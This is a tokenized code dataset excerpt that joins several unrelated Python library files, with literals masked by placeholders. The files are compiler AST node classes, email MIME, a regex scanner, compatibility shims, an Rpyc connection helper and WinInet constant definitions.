) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class UnaryAdd ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . 
expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class UnarySub ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class While ( Node ) : <EOL> def __init__ ( self , test , body , else_ , lineno = None ) : <EOL> self . test = test <EOL> self . body = body <EOL> self . else_ = else_ <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . test ) <EOL> children . append ( self . body ) <EOL> children . append ( self . else_ ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . test ) <EOL> nodelist . append ( self . body ) <EOL> if self . else_ is not None : <EOL> nodelist . append ( self . else_ ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , repr ( self . body ) , repr ( self . else_ ) ) <EOL> class With ( Node ) : <EOL> def __init__ ( self , expr , vars , body , lineno = None ) : <EOL> self . expr = expr <EOL> self . vars = vars <EOL> self . body = body <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . append ( self . vars ) <EOL> children . append ( self . body ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> if self . vars is not None : <EOL> nodelist . append ( self . vars ) <EOL> nodelist . append ( self . body ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . vars ) , repr ( self . 
body ) ) <EOL> class Yield ( Node ) : <EOL> def __init__ ( self , value , lineno = None ) : <EOL> self . value = value <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . value , <EOL> def getChildNodes ( self ) : <EOL> return self . value , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . value ) , ) <EOL> for name , obj in globals ( ) . items ( ) : <EOL> if isinstance ( obj , type ) and issubclass ( obj , Node ) : <EOL> nodes [ name . lower ( ) ] = obj </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> from email import errors <EOL> from email . mime . base import MIMEBase <EOL> class MIMENonMultipart ( MIMEBase ) : <EOL> """<STR_LIT>""" <EOL> __pychecker__ = '<STR_LIT>' <EOL> def attach ( self , payload ) : <EOL> raise errors . MultipartConversionError ( <EOL> '<STR_LIT>' ) <EOL> del __pychecker__ </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import sre_parse <EOL> import sre_compile <EOL> import sre_constants <EOL> from re import VERBOSE , MULTILINE , DOTALL <EOL> from sre_constants import BRANCH , SUBPATTERN <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS = ( VERBOSE | MULTILINE | DOTALL ) <EOL> class Scanner ( object ) : <EOL> def __init__ ( self , lexicon , flags = FLAGS ) : <EOL> self . actions = [ None ] <EOL> s = sre_parse . Pattern ( ) <EOL> s . flags = flags <EOL> p = [ ] <EOL> for idx , token in enumerate ( lexicon ) : <EOL> phrase = token . pattern <EOL> try : <EOL> subpattern = sre_parse . SubPattern ( s , <EOL> [ ( SUBPATTERN , ( idx + <NUM_LIT:1> , sre_parse . parse ( phrase , flags ) ) ) ] ) <EOL> except sre_constants . error : <EOL> raise <EOL> p . append ( subpattern ) <EOL> self . actions . append ( token ) <EOL> s . groups = len ( p ) + <NUM_LIT:1> <EOL> p = sre_parse . SubPattern ( s , [ ( BRANCH , ( None , p ) ) ] ) <EOL> self . scanner = sre_compile . compile ( p ) <EOL> def iterscan ( self , string , idx = <NUM_LIT:0> , context = None ) : <EOL> """<STR_LIT>""" <EOL> match = self . scanner . scanner ( string , idx ) . match <EOL> actions = self . actions <EOL> lastend = idx <EOL> end = len ( string ) <EOL> while True : <EOL> m = match ( ) <EOL> if m is None : <EOL> break <EOL> matchbegin , matchend = m . span ( ) <EOL> if lastend == matchend : <EOL> break <EOL> action = actions [ m . lastindex ] <EOL> if action is not None : <EOL> rval , next_pos = action ( m , context ) <EOL> if next_pos is not None and next_pos != matchend : <EOL> matchend = next_pos <EOL> match = self . scanner . scanner ( string , matchend ) . match <EOL> yield rval , matchend <EOL> lastend = matchend <EOL> def pattern ( pattern , flags = FLAGS ) : <EOL> def decorator ( fn ) : <EOL> fn . pattern = pattern <EOL> fn . regex = re . compile ( pattern , flags ) <EOL> return fn <EOL> return decorator </s>
<s> """<STR_LIT>""" <EOL> from warnings import warnpy3k <EOL> warnpy3k ( "<STR_LIT>" <EOL> "<STR_LIT>" , stacklevel = <NUM_LIT:2> ) <EOL> del warnpy3k <EOL> from types import ClassType as classobj <EOL> from types import FunctionType as function <EOL> from types import InstanceType as instance <EOL> from types import MethodType as instancemethod <EOL> from types import ModuleType as module <EOL> try : <EOL> from types import CodeType as code <EOL> except ImportError : <EOL> pass </s>
<s> import warnings <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning , <NUM_LIT:2> ) <EOL> from hashlib import sha1 as sha <EOL> new = sha <EOL> blocksize = <NUM_LIT:1> <EOL> digest_size = <NUM_LIT:20> <EOL> digestsize = <NUM_LIT:20> </s>
<s> """<STR_LIT>""" <EOL> from weakref import WeakValueDictionary <EOL> from Serving import DEFAULT_PORT <EOL> from Rpyc . Stream import SocketStream , PipeStream <EOL> from Rpyc . Channel import Channel <EOL> from Rpyc . Connection import Connection <EOL> from Rpyc . AsyncNetProxy import AsyncNetProxy <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> def SocketConnection ( host , port = DEFAULT_PORT ) : <EOL> """<STR_LIT>""" <EOL> return Connection ( Channel ( SocketStream . from_new_socket ( host , port ) ) ) <EOL> def PipeConnection ( incoming , outgoing ) : <EOL> """<STR_LIT>""" <EOL> return Connection ( Channel ( PipeStream ( incoming , outgoing ) ) ) <EOL> class LoginError ( Exception ) : <EOL> pass <EOL> def SecSocketConnection ( host , username , password , port = DEFAULT_PORT ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> stream = SocketStream . from_new_secure_socket ( host , port , username , password ) <EOL> except : <EOL> raise LoginError ( "<STR_LIT>" ) <EOL> return Connection ( Channel ( stream ) ) <EOL> _async_proxy_cache = WeakValueDictionary ( ) <EOL> def Async ( proxy ) : <EOL> """<STR_LIT>""" <EOL> key = id ( proxy ) <EOL> if key in _async_proxy_cache : <EOL> return _async_proxy_cache [ key ] <EOL> else : <EOL> new_proxy = AsyncNetProxy ( proxy ) <EOL> _async_proxy_cache [ key ] = new_proxy <EOL> return new_proxy </s>
<s> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> import emacs , notemacs , vi <EOL> editingmodes = [ emacs . EmacsMode , notemacs . NotEmacsMode , vi . ViMode ] </s>
<s> INTERNET_INVALID_PORT_NUMBER = <NUM_LIT:0> <EOL> INTERNET_DEFAULT_FTP_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_GOPHER_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_HTTP_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_HTTPS_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_SOCKS_PORT = <NUM_LIT> <EOL> INTERNET_MAX_HOST_NAME_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_USER_NAME_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_PASSWORD_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_PORT_NUMBER_LENGTH = <NUM_LIT:5> <EOL> INTERNET_MAX_PORT_NUMBER_VALUE = <NUM_LIT> <EOL> INTERNET_MAX_PATH_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_SCHEME_LENGTH = <NUM_LIT:32> <EOL> INTERNET_KEEP_ALIVE_ENABLED = <NUM_LIT:1> <EOL> INTERNET_KEEP_ALIVE_DISABLED = <NUM_LIT:0> <EOL> INTERNET_REQFLAG_FROM_CACHE = <NUM_LIT> <EOL> INTERNET_REQFLAG_ASYNC = <NUM_LIT> <EOL> INTERNET_REQFLAG_VIA_PROXY = <NUM_LIT> <EOL> INTERNET_REQFLAG_NO_HEADERS = <NUM_LIT> <EOL> INTERNET_REQFLAG_PASSIVE = <NUM_LIT> <EOL> INTERNET_REQFLAG_CACHE_WRITE_DISABLED = <NUM_LIT> <EOL> INTERNET_REQFLAG_NET_TIMEOUT = <NUM_LIT> <EOL> INTERNET_FLAG_RELOAD = ( - <NUM_LIT> ) <EOL> INTERNET_FLAG_RAW_DATA = <NUM_LIT> <EOL> INTERNET_FLAG_EXISTING_CONNECT = <NUM_LIT> <EOL> INTERNET_FLAG_ASYNC = <NUM_LIT> <EOL> INTERNET_FLAG_PASSIVE = <NUM_LIT> <EOL> INTERNET_FLAG_NO_CACHE_WRITE = <NUM_LIT> <EOL> INTERNET_FLAG_DONT_CACHE = INTERNET_FLAG_NO_CACHE_WRITE <EOL> INTERNET_FLAG_MAKE_PERSISTENT = <NUM_LIT> <EOL> INTERNET_FLAG_FROM_CACHE = <NUM_LIT> <EOL> INTERNET_FLAG_OFFLINE = INTERNET_FLAG_FROM_CACHE <EOL> INTERNET_FLAG_SECURE = <NUM_LIT> <EOL> INTERNET_FLAG_KEEP_CONNECTION = <NUM_LIT> <EOL> INTERNET_FLAG_NO_AUTO_REDIRECT = <NUM_LIT> <EOL> INTERNET_FLAG_READ_PREFETCH = <NUM_LIT> <EOL> INTERNET_FLAG_NO_COOKIES = <NUM_LIT> <EOL> INTERNET_FLAG_NO_AUTH = <NUM_LIT> <EOL> INTERNET_FLAG_RESTRICTED_ZONE = <NUM_LIT> <EOL> INTERNET_FLAG_CACHE_IF_NET_FAIL = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS = <NUM_LIT> <EOL> 
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_CERT_CN_INVALID = <NUM_LIT> <EOL> INTERNET_FLAG_RESYNCHRONIZE = <NUM_LIT> <EOL> INTERNET_FLAG_HYPERLINK = <NUM_LIT> <EOL> INTERNET_FLAG_NO_UI = <NUM_LIT> <EOL> INTERNET_FLAG_PRAGMA_NOCACHE = <NUM_LIT> <EOL> INTERNET_FLAG_CACHE_ASYNC = <NUM_LIT> <EOL> INTERNET_FLAG_FORMS_SUBMIT = <NUM_LIT> <EOL> INTERNET_FLAG_FWD_BACK = <NUM_LIT> <EOL> INTERNET_FLAG_NEED_FILE = <NUM_LIT> <EOL> INTERNET_FLAG_MUST_CACHE_REQUEST = INTERNET_FLAG_NEED_FILE <EOL> SECURITY_INTERNET_MASK = ( INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP ) <EOL> INTERNET_ERROR_MASK_INSERT_CDROM = <NUM_LIT> <EOL> INTERNET_ERROR_MASK_COMBINED_SEC_CERT = <NUM_LIT> <EOL> INTERNET_ERROR_MASK_NEED_MSN_SSPI_PKG = <NUM_LIT> <EOL> INTERNET_ERROR_MASK_LOGIN_FAILURE_DISPLAY_ENTITY_BODY = <NUM_LIT> <EOL> WININET_API_FLAG_ASYNC = <NUM_LIT> <EOL> WININET_API_FLAG_SYNC = <NUM_LIT> <EOL> WININET_API_FLAG_USE_CONTEXT = <NUM_LIT> <EOL> INTERNET_NO_CALLBACK = <NUM_LIT:0> <EOL> IDSI_FLAG_KEEP_ALIVE = <NUM_LIT> <EOL> IDSI_FLAG_SECURE = <NUM_LIT> <EOL> IDSI_FLAG_PROXY = <NUM_LIT> <EOL> IDSI_FLAG_TUNNEL = <NUM_LIT> <EOL> INTERNET_PER_CONN_FLAGS = <NUM_LIT:1> <EOL> INTERNET_PER_CONN_PROXY_SERVER = <NUM_LIT:2> <EOL> INTERNET_PER_CONN_PROXY_BYPASS = <NUM_LIT:3> <EOL> INTERNET_PER_CONN_AUTOCONFIG_URL = <NUM_LIT:4> <EOL> INTERNET_PER_CONN_AUTODISCOVERY_FLAGS = <NUM_LIT:5> <EOL> INTERNET_PER_CONN_AUTOCONFIG_SECONDARY_URL = <NUM_LIT:6> <EOL> INTERNET_PER_CONN_AUTOCONFIG_RELOAD_DELAY_MINS = <NUM_LIT:7> <EOL> INTERNET_PER_CONN_AUTOCONFIG_LAST_DETECT_TIME = <NUM_LIT:8> <EOL> INTERNET_PER_CONN_AUTOCONFIG_LAST_DETECT_URL = <NUM_LIT:9> <EOL> PROXY_TYPE_DIRECT = <NUM_LIT> <EOL> PROXY_TYPE_PROXY = <NUM_LIT> <EOL> PROXY_TYPE_AUTO_PROXY_URL = <NUM_LIT> <EOL> PROXY_TYPE_AUTO_DETECT = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_USER_SET = <NUM_LIT> <EOL> 
AUTO_PROXY_FLAG_ALWAYS_DETECT = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_DETECTION_RUN = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_MIGRATED = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_DONT_CACHE_PROXY_RESULT = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_CACHE_INIT_RUN = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_DETECTION_SUSPECT = <NUM_LIT> <EOL> ISO_FORCE_DISCONNECTED = <NUM_LIT> <EOL> INTERNET_RFC1123_FORMAT = <NUM_LIT:0> <EOL> INTERNET_RFC1123_BUFSIZE = <NUM_LIT:30> <EOL> ICU_ESCAPE = ( - <NUM_LIT> ) <EOL> ICU_USERNAME = <NUM_LIT> <EOL> ICU_NO_ENCODE = <NUM_LIT> <EOL> ICU_DECODE = <NUM_LIT> <EOL> ICU_NO_META = <NUM_LIT> <EOL> ICU_ENCODE_SPACES_ONLY = <NUM_LIT> <EOL> ICU_BROWSER_MODE = <NUM_LIT> <EOL> ICU_ENCODE_PERCENT = <NUM_LIT> <EOL> INTERNET_OPEN_TYPE_PRECONFIG = <NUM_LIT:0> <EOL> INTERNET_OPEN_TYPE_DIRECT = <NUM_LIT:1> <EOL> INTERNET_OPEN_TYPE_PROXY = <NUM_LIT:3> <EOL> INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY = <NUM_LIT:4> <EOL> PRE_CONFIG_INTERNET_ACCESS = INTERNET_OPEN_TYPE_PRECONFIG <EOL> LOCAL_INTERNET_ACCESS = INTERNET_OPEN_TYPE_DIRECT <EOL> CERN_PROXY_INTERNET_ACCESS = INTERNET_OPEN_TYPE_PROXY <EOL> INTERNET_SERVICE_FTP = <NUM_LIT:1> <EOL> INTERNET_SERVICE_GOPHER = <NUM_LIT:2> <EOL> INTERNET_SERVICE_HTTP = <NUM_LIT:3> <EOL> IRF_ASYNC = WININET_API_FLAG_ASYNC <EOL> IRF_SYNC = WININET_API_FLAG_SYNC <EOL> IRF_USE_CONTEXT = WININET_API_FLAG_USE_CONTEXT <EOL> IRF_NO_WAIT = <NUM_LIT> <EOL> ISO_GLOBAL = <NUM_LIT> <EOL> ISO_REGISTRY = <NUM_LIT> <EOL> ISO_VALID_FLAGS = ( ISO_GLOBAL | ISO_REGISTRY ) <EOL> INTERNET_OPTION_CALLBACK = <NUM_LIT:1> <EOL> INTERNET_OPTION_CONNECT_TIMEOUT = <NUM_LIT:2> <EOL> INTERNET_OPTION_CONNECT_RETRIES = <NUM_LIT:3> <EOL> INTERNET_OPTION_CONNECT_BACKOFF = <NUM_LIT:4> <EOL> INTERNET_OPTION_SEND_TIMEOUT = <NUM_LIT:5> <EOL> INTERNET_OPTION_CONTROL_SEND_TIMEOUT = INTERNET_OPTION_SEND_TIMEOUT <EOL> INTERNET_OPTION_RECEIVE_TIMEOUT = <NUM_LIT:6> <EOL> INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT = INTERNET_OPTION_RECEIVE_TIMEOUT <EOL> INTERNET_OPTION_DATA_SEND_TIMEOUT = <NUM_LIT:7> <EOL> 
INTERNET_OPTION_DATA_RECEIVE_TIMEOUT = <NUM_LIT:8> <EOL> INTERNET_OPTION_HANDLE_TYPE = <NUM_LIT:9> <EOL> INTERNET_OPTION_LISTEN_TIMEOUT = <NUM_LIT:11> <EOL> INTERNET_OPTION_READ_BUFFER_SIZE = <NUM_LIT:12> <EOL> INTERNET_OPTION_WRITE_BUFFER_SIZE = <NUM_LIT> <EOL> INTERNET_OPTION_ASYNC_ID = <NUM_LIT:15> <EOL> INTERNET_OPTION_ASYNC_PRIORITY = <NUM_LIT:16> <EOL> INTERNET_OPTION_PARENT_HANDLE = <NUM_LIT> <EOL> INTERNET_OPTION_KEEP_CONNECTION = <NUM_LIT> <EOL> INTERNET_OPTION_REQUEST_FLAGS = <NUM_LIT> <EOL> INTERNET_OPTION_EXTENDED_ERROR = <NUM_LIT> <EOL> INTERNET_OPTION_OFFLINE_MODE = <NUM_LIT> <EOL> INTERNET_OPTION_CACHE_STREAM_HANDLE = <NUM_LIT> <EOL> INTERNET_OPTION_USERNAME = <NUM_LIT> <EOL> INTERNET_OPTION_PASSWORD = <NUM_LIT> <EOL> INTERNET_OPTION_ASYNC = <NUM_LIT:30> <EOL> INTERNET_OPTION_SECURITY_FLAGS = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT = <NUM_LIT:32> <EOL> INTERNET_OPTION_DATAFILE_NAME = <NUM_LIT> <EOL> INTERNET_OPTION_URL = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_CERTIFICATE = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_KEY_BITNESS = <NUM_LIT> <EOL> INTERNET_OPTION_REFRESH = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY = <NUM_LIT> <EOL> INTERNET_OPTION_SETTINGS_CHANGED = <NUM_LIT> <EOL> INTERNET_OPTION_VERSION = <NUM_LIT> <EOL> INTERNET_OPTION_USER_AGENT = <NUM_LIT> <EOL> INTERNET_OPTION_END_BROWSER_SESSION = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY_USERNAME = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY_PASSWORD = <NUM_LIT> <EOL> INTERNET_OPTION_CONTEXT_VALUE = <NUM_LIT> <EOL> INTERNET_OPTION_CONNECT_LIMIT = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT = <NUM_LIT> <EOL> INTERNET_OPTION_POLICY = <NUM_LIT> <EOL> INTERNET_OPTION_DISCONNECTED_TIMEOUT = <NUM_LIT> <EOL> INTERNET_OPTION_CONNECTED_STATE = <NUM_LIT:50> <EOL> INTERNET_OPTION_IDLE_STATE = <NUM_LIT> <EOL> INTERNET_OPTION_OFFLINE_SEMANTICS = <NUM_LIT> <EOL> INTERNET_OPTION_SECONDARY_CACHE_KEY = <NUM_LIT> <EOL> INTERNET_OPTION_CALLBACK_FILTER = <NUM_LIT> <EOL> 
INTERNET_OPTION_CONNECT_TIME = <NUM_LIT> <EOL> INTERNET_OPTION_SEND_THROUGHPUT = <NUM_LIT> <EOL> INTERNET_OPTION_RECEIVE_THROUGHPUT = <NUM_LIT> <EOL> INTERNET_OPTION_REQUEST_PRIORITY = <NUM_LIT> <EOL> INTERNET_OPTION_HTTP_VERSION = <NUM_LIT> <EOL> INTERNET_OPTION_RESET_URLCACHE_SESSION = <NUM_LIT> <EOL> INTERNET_OPTION_ERROR_MASK = <NUM_LIT> <EOL> INTERNET_OPTION_FROM_CACHE_TIMEOUT = <NUM_LIT> <EOL> INTERNET_OPTION_BYPASS_EDITED_ENTRY = <NUM_LIT:64> <EOL> INTERNET_OPTION_DIAGNOSTIC_SOCKET_INFO = <NUM_LIT> <EOL> INTERNET_OPTION_CODEPAGE = <NUM_LIT> <EOL> INTERNET_OPTION_CACHE_TIMESTAMPS = <NUM_LIT> <EOL> INTERNET_OPTION_DISABLE_AUTODIAL = <NUM_LIT> <EOL> INTERNET_OPTION_MAX_CONNS_PER_SERVER = <NUM_LIT> <EOL> INTERNET_OPTION_MAX_CONNS_PER_1_0_SERVER = <NUM_LIT> <EOL> INTERNET_OPTION_PER_CONNECTION_OPTION = <NUM_LIT> <EOL> INTERNET_OPTION_DIGEST_AUTH_UNLOAD = <NUM_LIT> <EOL> INTERNET_OPTION_IGNORE_OFFLINE = <NUM_LIT> <EOL> INTERNET_OPTION_IDENTITY = <NUM_LIT> <EOL> INTERNET_OPTION_REMOVE_IDENTITY = <NUM_LIT> <EOL> INTERNET_OPTION_ALTER_IDENTITY = <NUM_LIT> <EOL> INTERNET_OPTION_SUPPRESS_BEHAVIOR = <NUM_LIT> <EOL> INTERNET_OPTION_AUTODIAL_MODE = <NUM_LIT> <EOL> INTERNET_OPTION_AUTODIAL_CONNECTION = <NUM_LIT> <EOL> INTERNET_OPTION_CLIENT_CERT_CONTEXT = <NUM_LIT> <EOL> INTERNET_OPTION_AUTH_FLAGS = <NUM_LIT> <EOL> INTERNET_OPTION_COOKIES_3RD_PARTY = <NUM_LIT> <EOL> INTERNET_OPTION_DISABLE_PASSPORT_AUTH = <NUM_LIT> <EOL> INTERNET_OPTION_SEND_UTF8_SERVERNAME_TO_PROXY = <NUM_LIT> <EOL> INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT = <NUM_LIT> <EOL> INTERNET_OPTION_ENABLE_PASSPORT_AUTH = <NUM_LIT> <EOL> INTERNET_OPTION_HIBERNATE_INACTIVE_WORKER_THREADS = <NUM_LIT> <EOL> INTERNET_OPTION_ACTIVATE_WORKER_THREADS = <NUM_LIT> <EOL> INTERNET_OPTION_RESTORE_WORKER_THREAD_DEFAULTS = <NUM_LIT> <EOL> INTERNET_OPTION_SOCKET_SEND_BUFFER_LENGTH = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY_SETTINGS_CHANGED = <NUM_LIT> <EOL> INTERNET_FIRST_OPTION = INTERNET_OPTION_CALLBACK <EOL> INTERNET_LAST_OPTION = 
INTERNET_OPTION_PROXY_SETTINGS_CHANGED <EOL> INTERNET_PRIORITY_FOREGROUND = <NUM_LIT:1000> <EOL> INTERNET_HANDLE_TYPE_INTERNET = <NUM_LIT:1> <EOL> INTERNET_HANDLE_TYPE_CONNECT_FTP = <NUM_LIT:2> <EOL> INTERNET_HANDLE_TYPE_CONNECT_GOPHER = <NUM_LIT:3> <EOL> INTERNET_HANDLE_TYPE_CONNECT_HTTP = <NUM_LIT:4> <EOL> INTERNET_HANDLE_TYPE_FTP_FIND = <NUM_LIT:5> <EOL> INTERNET_HANDLE_TYPE_FTP_FIND_HTML = <NUM_LIT:6> <EOL> INTERNET_HANDLE_TYPE_FTP_FILE = <NUM_LIT:7> <EOL> INTERNET_HANDLE_TYPE_FTP_FILE_HTML = <NUM_LIT:8> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FIND = <NUM_LIT:9> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FIND_HTML = <NUM_LIT:10> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FILE = <NUM_LIT:11> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FILE_HTML = <NUM_LIT:12> <EOL> INTERNET_HANDLE_TYPE_HTTP_REQUEST = <NUM_LIT> <EOL> INTERNET_HANDLE_TYPE_FILE_REQUEST = <NUM_LIT> <EOL> AUTH_FLAG_DISABLE_NEGOTIATE = <NUM_LIT> <EOL> AUTH_FLAG_ENABLE_NEGOTIATE = <NUM_LIT> <EOL> SECURITY_FLAG_SECURE = <NUM_LIT> <EOL> SECURITY_FLAG_STRENGTH_WEAK = <NUM_LIT> <EOL> SECURITY_FLAG_STRENGTH_MEDIUM = <NUM_LIT> <EOL> SECURITY_FLAG_STRENGTH_STRONG = <NUM_LIT> <EOL> SECURITY_FLAG_UNKNOWNBIT = ( - <NUM_LIT> ) <EOL> SECURITY_FLAG_FORTEZZA = <NUM_LIT> <EOL> SECURITY_FLAG_NORMALBITNESS = SECURITY_FLAG_STRENGTH_WEAK <EOL> SECURITY_FLAG_SSL = <NUM_LIT> <EOL> SECURITY_FLAG_SSL3 = <NUM_LIT> <EOL> SECURITY_FLAG_PCT = <NUM_LIT> <EOL> SECURITY_FLAG_PCT4 = <NUM_LIT> <EOL> SECURITY_FLAG_IETFSSL4 = <NUM_LIT> <EOL> SECURITY_FLAG_40BIT = SECURITY_FLAG_STRENGTH_WEAK <EOL> SECURITY_FLAG_128BIT = SECURITY_FLAG_STRENGTH_STRONG <EOL> SECURITY_FLAG_56BIT = SECURITY_FLAG_STRENGTH_MEDIUM <EOL> SECURITY_FLAG_IGNORE_REVOCATION = <NUM_LIT> <EOL> SECURITY_FLAG_IGNORE_UNKNOWN_CA = <NUM_LIT> <EOL> SECURITY_FLAG_IGNORE_WRONG_USAGE = <NUM_LIT> <EOL> SECURITY_FLAG_IGNORE_CERT_CN_INVALID = INTERNET_FLAG_IGNORE_CERT_CN_INVALID <EOL> SECURITY_FLAG_IGNORE_CERT_DATE_INVALID = INTERNET_FLAG_IGNORE_CERT_DATE_INVALID <EOL> SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS = 
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS <EOL> SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP <EOL> SECURITY_SET_MASK = ( SECURITY_FLAG_IGNORE_REVOCATION | SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_WRONG_USAGE ) <EOL> AUTODIAL_MODE_NEVER = <NUM_LIT:1> <EOL> AUTODIAL_MODE_ALWAYS = <NUM_LIT:2> <EOL> AUTODIAL_MODE_NO_NETWORK_PRESENT = <NUM_LIT:4> <EOL> INTERNET_STATUS_RESOLVING_NAME = <NUM_LIT:10> <EOL> INTERNET_STATUS_NAME_RESOLVED = <NUM_LIT:11> <EOL> INTERNET_STATUS_CONNECTING_TO_SERVER = <NUM_LIT:20> <EOL> INTERNET_STATUS_CONNECTED_TO_SERVER = <NUM_LIT> <EOL> INTERNET_STATUS_SENDING_REQUEST = <NUM_LIT:30> <EOL> INTERNET_STATUS_REQUEST_SENT = <NUM_LIT> <EOL> INTERNET_STATUS_RECEIVING_RESPONSE = <NUM_LIT> <EOL> INTERNET_STATUS_RESPONSE_RECEIVED = <NUM_LIT> <EOL> INTERNET_STATUS_CTL_RESPONSE_RECEIVED = <NUM_LIT> <EOL> INTERNET_STATUS_PREFETCH = <NUM_LIT> <EOL> INTERNET_STATUS_CLOSING_CONNECTION = <NUM_LIT:50> <EOL> INTERNET_STATUS_CONNECTION_CLOSED = <NUM_LIT> <EOL> INTERNET_STATUS_HANDLE_CREATED = <NUM_LIT> <EOL> INTERNET_STATUS_HANDLE_CLOSING = <NUM_LIT> <EOL> INTERNET_STATUS_DETECTING_PROXY = <NUM_LIT> <EOL> INTERNET_STATUS_REQUEST_COMPLETE = <NUM_LIT:100> <EOL> INTERNET_STATUS_REDIRECT = <NUM_LIT> <EOL> INTERNET_STATUS_INTERMEDIATE_RESPONSE = <NUM_LIT> <EOL> INTERNET_STATUS_USER_INPUT_REQUIRED = <NUM_LIT> <EOL> INTERNET_STATUS_STATE_CHANGE = <NUM_LIT:200> <EOL> INTERNET_STATUS_COOKIE_SENT = <NUM_LIT> <EOL> INTERNET_STATUS_COOKIE_RECEIVED = <NUM_LIT> <EOL> INTERNET_STATUS_PRIVACY_IMPACTED = <NUM_LIT> <EOL> INTERNET_STATUS_P3P_HEADER = <NUM_LIT> <EOL> INTERNET_STATUS_P3P_POLICYREF = <NUM_LIT> <EOL> INTERNET_STATUS_COOKIE_HISTORY = <NUM_LIT> <EOL> INTERNET_STATE_CONNECTED = <NUM_LIT> <EOL> INTERNET_STATE_DISCONNECTED = <NUM_LIT> <EOL> INTERNET_STATE_DISCONNECTED_BY_USER = <NUM_LIT> <EOL> INTERNET_STATE_IDLE = <NUM_LIT> <EOL> INTERNET_STATE_BUSY = 
